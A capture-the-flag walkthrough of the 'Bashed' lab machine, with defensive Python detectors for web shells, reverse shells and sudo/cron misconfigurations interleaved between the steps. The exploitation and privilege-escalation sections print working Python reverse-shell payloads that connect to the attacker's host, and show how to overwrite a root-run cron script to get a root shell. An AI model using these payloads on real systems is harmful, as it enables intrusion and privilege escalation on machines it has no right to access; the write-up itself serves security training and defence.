# Bashed (Easy)

## Lessons Learned

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FEeWTjd86RHcZ0i75LY22%2Fbashed.PNG?alt=media\&token=4320b600-4211-4e56-a8df-3842fd750df4)

## Report-Penetration

**Vulnerable Exploit:** Misconfigured web shell file

**System Vulnerable:** 10.10.10.68

**Vulnerability Explanation:** The application fails to restrict access to the web shell file, which allows an unauthorized user to reach the /dev directory as well as the web shell file. Privilege escalation is possible because of misconfigured permissions, which allow the www-data user to escalate to another user and execute a file as root.

**Privilege Escalation Vulnerability:** Misconfigured user permissions

**Vulnerability Fix:** Restrict access to sensitive directories and files from unauthorized users and apply least privilege to the users on the machine.

**Severity:** High

**Steps to Compromise the Host:**

## Reconnaissance

```
nmap -sC -sV -p- -T4 10.10.10.68
```

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2F1Oxsdx7CsTAVJ0eTB4hy%2F1.png?alt=media\&token=0ab858c4-e3a6-46fa-a09a-29c3ab626457)

## Enumeration

**Port 80 Apache/2.4.18 (Ubuntu)**

We found only port 80 open on the remote machine. Let's browse to port 80 and check it.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2Fa8vH2tV0Bk03xzkzGmCV%2F1.png?alt=media\&token=d9ed155e-8fee-47a8-b891-7e7dd035dd9f)

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2Fi43tC0RUNwKDtlyc8QE2%2F1.png?alt=media\&token=c5e810f4-5c87-4475-8bcc-cb7304887215)

Let's start enumerating with gobuster to find any hidden directories. The interesting directory we found is **/dev**.

```
$ gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/10/28 10:25:08 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/server-status        (Status: 403) [Size: 299]

===============================================================
2021/10/28 10:28:28 Finished
===============================================================
```

We saw the file name **phpbash.php** displayed on the main web page.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2F9JaIKRSXh03B03pN7Xwg%2F1.png?alt=media\&token=4741b113-22f4-4332-9947-12e12a4c5dac)

Clicking on that file redirects us to a web shell from which we can execute commands on the remote machine.
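From the defender's side, the same finding shows up clearly in the web server's access log. The following is an added example and not part of the original writeup: a small Python detector that parses Apache combined-format log lines and flags the request pattern of a browsable web shell (a PHP file served from a development or upload directory, POSTs to it, and command-style query parameters). The sample log lines, the directory list and the parameter names are constructed assumptions for this example and should be tuned to the site being monitored.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" log format (not taken from the box).
SAMPLE_LOG = """\
10.10.14.31 - - [28/Oct/2021:10:25:08 +0000] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
10.10.14.31 - - [28/Oct/2021:10:25:09 +0000] "GET /css/main.css HTTP/1.1" 200 2201 "http://10.10.10.68/" "Mozilla/5.0"
10.10.14.31 - - [28/Oct/2021:10:26:40 +0000] "GET /dev/ HTTP/1.1" 200 1085 "-" "Mozilla/5.0"
10.10.14.31 - - [28/Oct/2021:10:26:41 +0000] "GET /dev/phpbash.php HTTP/1.1" 200 5893 "http://10.10.10.68/dev/" "Mozilla/5.0"
10.10.14.31 - - [28/Oct/2021:10:26:55 +0000] "POST /dev/phpbash.php HTTP/1.1" 200 312 "http://10.10.10.68/dev/phpbash.php" "Mozilla/5.0"
10.10.14.31 - - [28/Oct/2021:10:27:02 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 404 299 "-" "curl/7.74.0"
"""

# Combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should never serve executable PHP to the public, and request
# parameter names commonly used to carry a command. Both are assumptions here.
SENSITIVE_DIRS = ("/dev/", "/uploads/", "/php/")
CMD_PARAMS = {"cmd", "c", "exec", "command"}


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons this request looks like web-shell activity."""
    reasons = []
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    params = set(parse_qs(parts.query).keys())
    php_in_sensitive_dir = path.endswith(".php") and path.startswith(SENSITIVE_DIRS)
    if php_in_sensitive_dir:
        reasons.append("php executed from sensitive directory")
    if entry["method"] == "POST" and php_in_sensitive_dir:
        reasons.append("POST (command submission) to php in sensitive directory")
    if params & CMD_PARAMS:
        reasons.append("command-style parameter in query string")
    return reasons


def find_webshell_activity(log_text):
    """Scan a block of log text and return every flagged request with its reasons."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append({
                "ip": entry["ip"],
                "method": entry["method"],
                "target": entry["target"],
                "status": entry["status"],
                "reasons": reasons,
            })
    return hits


def summarize(hits):
    """Count flagged requests per source address and per script path."""
    by_ip = Counter(h["ip"] for h in hits)
    by_path = Counter(urlsplit(h["target"]).path for h in hits)
    return by_ip, by_path


if __name__ == "__main__":
    found = find_webshell_activity(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["method"]} {h["target"]} -> {h["status"]}: {", ".join(h["reasons"])}')
    by_ip, by_path = summarize(found)
    print("per source:", dict(by_ip))
    print("per script:", dict(by_path))
```

Run against a real `access.log` by feeding its text to `find_webshell_activity`; the per-script counter is usually the quickest way to spot a single PHP file receiving a stream of POSTs from one address, which is what an interactive shell session looks like in the log. Note that a 404 probe is still reported, since a request for a command parameter is worth seeing even when it failed.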

## Exploitation

By enumerating, we found netcat installed on the machine. We tried to get a reverse shell with it but unfortunately we couldn't.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FAddt3BLLjn5Dpt0dw0Uc%2F1.png?alt=media\&token=291387aa-74c9-4897-93e8-17b4a2777c11)

Let's enumerate whether any other tools are available on the machine. We found python, so we can get a reverse shell with a python one-liner.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FKEgcjVku9yH1zDxE7O74%2F1.png?alt=media\&token=cb55002b-ae69-4f92-abd7-d7a93b1a2e81)

Listening with netcat on port 4444, we get a shell on the machine.

```
nc -lvp 4444
```

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FsRuOWukxwEKKFiT2x5kw%2F1.png?alt=media\&token=2300b330-4615-4eb1-ae76-9729a40a2e4c)
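A defender looking for the shell obtained above does not need to know the payload: a `dup2()`-based reverse shell leaves behind a process whose stdin, stdout and stderr all point at the same socket, which no interactive shell on a terminal ever does. The following is an added example and not part of the writeup: it reads `/proc/<pid>/fd` for that fingerprint and restricts the match to shells and interpreters so that socket-activated daemons are not reported. The sample snapshot, the list of shell names, and uid 33 for www-data (the Debian/Ubuntu default) are assumptions for this example.

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

# Process names whose standard streams should never be a network socket.
# Assumption for this example; extend it for the interpreters present on the host.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}


def stdio_on_socket(fd_targets):
    """fd_targets maps fd number -> readlink() target for one process.
    True when fds 0, 1 and 2 all resolve to sockets: the dup2() reverse-shell shape."""
    return all(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def find_suspicious(processes):
    """Return the shells/interpreters whose standard streams are sockets.
    Each process is a dict with pid, comm, uid and fds (fd -> target)."""
    flagged = []
    for p in processes:
        if p["comm"] in SHELL_NAMES and stdio_on_socket(p["fds"]):
            flagged.append({"pid": p["pid"], "comm": p["comm"], "uid": p["uid"],
                            "socket": p["fds"][0]})
    return flagged


def collect_from_proc():
    """Live collector for Linux: snapshot every process whose fd table we may read."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            uid = os.stat(base).st_uid
            fds = {}
            for fd in os.listdir(f"{base}/fd"):
                try:
                    fds[int(fd)] = os.readlink(f"{base}/fd/{fd}")
                except OSError:
                    continue  # fd closed between listdir and readlink
        except OSError:
            continue  # process exited, or its fd table is not readable by us
        procs.append({"pid": int(pid), "comm": comm, "uid": uid, "fds": fds})
    return procs


# Constructed sample snapshot (not from the box): one interactive shell running as
# the web server account with all three standard streams on the same socket, next
# to ordinary processes that also hold sockets but only on higher fd numbers.
SAMPLE_SNAPSHOT = [
    {"pid": 1234, "comm": "apache2", "uid": 33,
     "fds": {0: "/dev/null", 1: "/var/log/apache2/access.log",
             2: "/var/log/apache2/error.log", 3: "socket:[20517]"}},
    {"pid": 1301, "comm": "sh", "uid": 33,
     "fds": {0: "socket:[21044]", 1: "socket:[21044]", 2: "socket:[21044]"}},
    {"pid": 1302, "comm": "bash", "uid": 1000,
     "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"pid": 1400, "comm": "sshd", "uid": 0,
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[19880]"}},
]


if __name__ == "__main__":
    snapshot = collect_from_proc() if os.path.isdir("/proc") else SAMPLE_SNAPSHOT
    for hit in find_suspicious(snapshot) or find_suspicious(SAMPLE_SNAPSHOT):
        print(f'pid {hit["pid"]} ({hit["comm"]}, uid {hit["uid"]}) has stdio on {hit["socket"]}')
```

The socket inode reported in the hit (`socket:[21044]` in the sample) can be matched against `ss -tnpe` or `/proc/net/tcp` to recover the remote address the shell is connected to, which turns the process finding into a network indicator. Run the collector as root to see every process; as an unprivileged user it only sees its own.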

## Privilege Escalation

First things first: once I get onto the machine, I run `sudo -l` to check our sudo rights. We found that we can run commands as user scriptmanager without knowing the password.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FKruby6I9Z09oA3gHUK4z%2F1.png?alt=media\&token=7f45f369-5964-49d2-8be5-b28526a42a8c)

By enumerating on the machine, we found an interesting directory, /scripts, owned by user scriptmanager, whereas the rest are owned by root. It seemed interesting to us.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FQmuW6fzfILDByTQ6vgsj%2F1.png?alt=media\&token=aaf5403e-9322-4821-9848-64a3f7a34910)

Let's escalate our privileges to the scriptmanager user.

```
sudo -u scriptmanager /bin/bash
```

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FDYjo0acxWmpLbEFMFYOb%2F1.png?alt=media\&token=b717b75e-8f29-44d1-ab80-35d14c6a50b2)

Once we access the scripts folder, we find 2 files: **test.py**, owned by user scriptmanager, and **test.txt**, owned by root.

### Automated python script

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FDWBM947TxjlwqvmaaWnT%2F1.png?alt=media\&token=efaaa371-cd12-4da3-bf76-cd93dd1fb5d5)

Viewing the file test.py, it seems to be scheduled to write the file test.txt with root permissions. As we have write permission on test.py, we can replace its contents with reverse shell code.

```
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.31",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/bash","-i"])
```

We can host this file on our kali machine and let the remote machine download it and replace the original.

```
python -m SimpleHTTPServer 80
```

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FMq8zRr1rZw4jONQqdo13%2F1.png?alt=media\&token=87cf41b2-a794-47ef-9de6-e4cfbcd41f08)

Let's rename **test.py.1** to **test.py** to replace the existing file, and set the permissions on the file.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FZ4Kjke8wWooP9jLp4AqB%2F1.png?alt=media\&token=31b3ebd2-7a9d-403a-b008-ab3eedaf00d7)

Let's run a netcat listener on port 5555 and wait a while for the script to execute.

![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FiMFSWUVcKmdNn7jRyXlI%2F1.png?alt=media\&token=2b9efe04-f127-4618-a48a-84d748908b37)
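The two misconfigurations that make this escalation possible, a passwordless sudo rule for the web server account and a root-scheduled script kept in a directory that another user owns, can both be audited mechanically rather than found by hand. The following is an added example and not part of the writeup or the box: it parses sudoers and system-crontab text and checks the ownership and write permissions of every script that root runs, including the containing directory, because a file you cannot edit can still be swapped out when its directory is writable (exactly the rename done above). The sudoers and crontab lines are constructed, `SERVICE_ACCOUNTS` is an assumption, and `demo()` recreates the file layout in a temporary directory.

```python
import os
import re
import stat
import tempfile

# Accounts that should never appear in sudoers at all (assumption for this example).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

# Constructed sudoers content (not copied from the box). The www-data rule is the
# kind of grant that lets a compromised web server account hop to another user.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(scriptmanager) NOPASSWD: ALL
"""

# user host=(runas) TAG: commands
SUDO_RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
# System crontab: five time fields, the user to run as, then the command.
CRON_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def audit_sudoers(text):
    """Flag sudo rules granted to service accounts and passwordless unrestricted rules."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        who = m.group("who").lstrip("%")
        if who in SERVICE_ACCOUNTS:
            findings.append(f"service account {who} has a sudo rule: {line}")
        if "NOPASSWD" in m.group("tags") and m.group("cmds").strip() == "ALL":
            findings.append(f"{who} may run any command without a password: {line}")
    return findings


def audit_script_file(path, expected_uid=0):
    """Check that a script executed by root is owned by root and cannot be edited
    or replaced by anyone else (both the file and its containing directory)."""
    issues = []
    st = os.stat(path)
    if st.st_uid != expected_uid:
        issues.append(f"owner uid {st.st_uid} != {expected_uid}")
    if st.st_mode & WRITABLE_BY_OTHERS:
        issues.append("file is group/world writable")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_uid != expected_uid or parent.st_mode & WRITABLE_BY_OTHERS:
        issues.append("containing directory lets others replace the file")
    return issues


def audit_crontab(text):
    """For every system-crontab job that runs as root, audit each absolute path
    in its command line (interpreter and script alike) that exists on disk."""
    findings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as PATH=...
        m = CRON_RE.match(line)
        if not m or m.group("user") != "root":
            continue
        for tok in m.group("cmd").split():
            if tok.startswith("/") and os.path.isfile(tok):
                issues = audit_script_file(tok)
                if issues:
                    findings[tok] = issues
    return findings


def demo():
    """Recreate the writeup's layout in a temp dir: a root cron job that runs a
    script living in a group-writable directory, and return the audit findings."""
    base = tempfile.mkdtemp()
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    script = os.path.join(scripts, "test.py")
    with open(script, "w") as f:
        f.write("print('placeholder script body')\n")
    os.chmod(script, 0o664)   # group can edit the script body
    os.chmod(scripts, 0o775)  # group can rename/replace files in the directory
    crontab = f"* * * * * root /usr/bin/python {script}\n"  # constructed entry
    return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("sudoers:", finding)
    for path, issues in demo().items():
        print(f"cron script {path}: {'; '.join(issues)}")
```

On a real host, feed `audit_sudoers` the output of `visudo -c -f` targets (or the files under `/etc/sudoers.d`) and `audit_crontab` the contents of `/etc/crontab` and `/etc/cron.d/*`; user crontabs under `/var/spool/cron` have no user field and would need the regex relaxed. The fix for both findings is the one the report states: remove the sudo grant from the web server account, and make every root-executed script and its directory root-owned and mode 0755 or tighter.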
